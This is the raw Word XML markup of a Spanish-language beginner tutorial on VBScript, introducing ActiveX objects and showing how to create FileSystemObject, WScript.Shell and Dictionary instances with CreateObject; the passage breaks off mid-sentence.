    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="431" w:line="265"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cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>PARTES DEL TUTORIAL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="2"/>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con Objetos: Introducción</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="2"/>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con Objetos: Trabajando con Archivos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="2"/>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con Objetos: Carpetas y Discos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="240" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="2"/>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con Objetos: Otras Funciones Útiles</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="594" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="77" w:right="2"/>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con Objetos: El Objeto Dictionary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="295" w:line="265" w:lineRule="auto"/>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Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>SOBRE  LOS</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  TUTORIALES:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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Visual Basic Script es un lenguaje de programación mediante Scripts (no genera .exe al no ser compilado), de alto nivel. En general es uno de los lenguajes más básicos y es, sin duda alguna, la base del Visual Basic 6, ya que todo lo que se aprende aquí, luego puede ser usado en él sin ningún cambio. En otras palabras, es el lenguaje que se suele aprender antes del Visual Basic 6. Es por eso que todo programador de Visual Basic que se precie debe conocerlo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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Con este motivo, para aquellos que se quieran iniciar en el mundo de la programación con un lenguaje sencillo de aprender, antes de estudiar en la universidad ya otros más avanzados, he decidido poner aquí un tutorial de aprendizaje de Visual Basic Script desde lo más básico hasta lo más avanzado, y posteriormente, como adaptar lo aprendido a Visual Basic 6, y un tutorial sobre él. En definitiva, lo que yo llamo un proceso de aprendizaje desde lo más simple hasta el nivel que te permitirá realizar programas como los que yo ofrezco...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="8"/>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Introducción en Programación en Visual Basic Script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>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b/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Programación con Objetos (ActiveX, “.ocx”) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="245"/>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Uso avanzado y Ejemplos de VBScript</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="863"/>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">De estos tres simples, pero </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>largos documentos está</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:sz w:val="20"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> compuesto el tutorial de Visual Basic Script. Deberás aprender por orden cada uno de ellos para continuar con el siguiente, pero no te apures, no es difícil.</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lo olvides, para dudas o consultas escribe a: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scswinter@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="140" w:line="259"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dudes en visitar: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.110mb.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="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w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programación  con</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Objetos: Introducción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isual Basic Script es un lenguaje de programación de alto nivel no compilado para Windows, y eso, solo quiere decir una cos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como la mayoría de lenguajes para Windows de este tipo, tiene acceso al uso de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, también llamados </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ActiveX</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ntes que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nada</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> hay que comprender bien que es un Objeto y para que sirve. Estoy seguro que a todos más o menos os suena la palabra </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Librería</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Son los archivos con extensión (que acaban en…) “.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">”, y que sin ellos los programas no van. Pues bien, los Objetos, podríamos decir que son una derivación de las librerías, ampliadas y mejoradas. Normalmente </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>una librería tiene tan solo funciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, a las que un programa llama. Es como si tuviéramos un script con un montón de funciones creadas por nosotros mediante la sentencia Function, y todos los scripts que creáramos en nuestra vida usaran esas funciones. Para que sea más fácil y ocupe menos, estas funciones se separar en una librería (dll) para que no se tengan que incluir en todos los programas. Sin embargo, como he dicho, los </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Objetos</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> son un derivado de las librerías y pueden (y suelen) contener mucho mas que simples funciones. Los objetos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>contienen trozos de programas enteros</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Pongamos un ejemplo, tú haces una Base de Datos para una empresa, y dicha base de datos tiene un sistema que hace que el programa se actualice (como lo tienen generalmente muchos programas); pues perfectamente el sistema de actualización entero (con sus ventanas y todo) puede ser un Objeto que este ya hecho y que tu solo utilices en tu programa. Como se puede ver es más sencillo que hacer tú todo el sistema de actualización.</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ues bien, Visual Basic 6 es un lenguaje basado en objetos que los usa al 100%, pero ya veremos en su momento lo que eso significa; lo que nos interesa ahora es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a diferencia de este, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Visual Basic Scrip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olo nos permite utilizar las funciones</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (y por supuesto no nos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>permite acceder a Librerias) de los Objetos, nada más. Esto se debe a que VBScript no soporta introducir elementos de programas discretos en un script que es secuencial, pero la razón no importa ahora, es así y nos tenemos que conformar. De esta manera pues, podríamos aprender a utilizar las muchísimas funciones que hay en los muchísimos objetos que existen (ya que de echo, con VB6 se pueden crear aún más Objetos), pero nosotros nos vamos a centrar en los Objetos simples del sistema; o lo que es lo mismo, en los objetos más comunes, estandarizados y que han sido diseñados exclusivamente pensando en Visual Basic Script. Estos son:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="13"/>
        <w:ind w:right="31" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="13"/>
        <w:ind w:right="31" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="239"/>
        <w:ind w:right="31" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.Dictionary</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supuesto existen miles de objetos más, pero esos tres nos van a dar casi el control total sobre el sistema, además de que son los más adecuados para VBScript. Ya cuando se vea VB6 veremos otros como </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">MSWinsock.Winsock </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que nos permitirán crear aplicaciones que trabajen en red.</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Bien, la forma de trabajar con Objetos es la de crear una instancia del objeto en una variable mediante un método especial (sería algo así como copiar la lista de funciones del objeto a la variable), y luego usar esa variable para utilizar las funciones del objeto:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="2412"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2429510" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4850" name="Picture 4850"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="4850" name="Picture 4850"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2429510" cy="1676400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Como podemos comprobar es el objeto quien hace la función, lo único que pasa es que al haberlo copiado nosotros en Variable1, es como si se tratara de una función de nuestro script. Más o menos esta es la teoría, pero vamos a ver como se hace en realidad esto (pongo todo el código para que lo veáis claro, pero a partir de ahora omitiré el proceso de creación de variables por motivos de brevedad):</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Option Explici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jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dim fso, ws, dic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="17"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject</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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.FileSystemObject</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0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="17"/>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b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject</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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell</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308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="17"/>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dic = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CreateObject</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w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Scripting.Dictionary</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ste es el código necesario para realizar el Paso 1, es decir, crear una instancia del objeto en una variable de nuestro script. Analicemos la situación: Primero creamos tres variables con nombres “</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>fso, ws y dic</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">”, hasta ahí normal. Luego, vemos que usamos la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Función</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CreateObject</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, que tiene un argumento que se corresponde a un valor de cadena que indica el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>nombre del objeto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> que queremos utilizar. De esta forma, la variable fso esta lista para utilizar las funciones del objeto </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting.FileSystemObject, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la variable ws </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>las  del</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> objeto</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> WScript.Shell </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
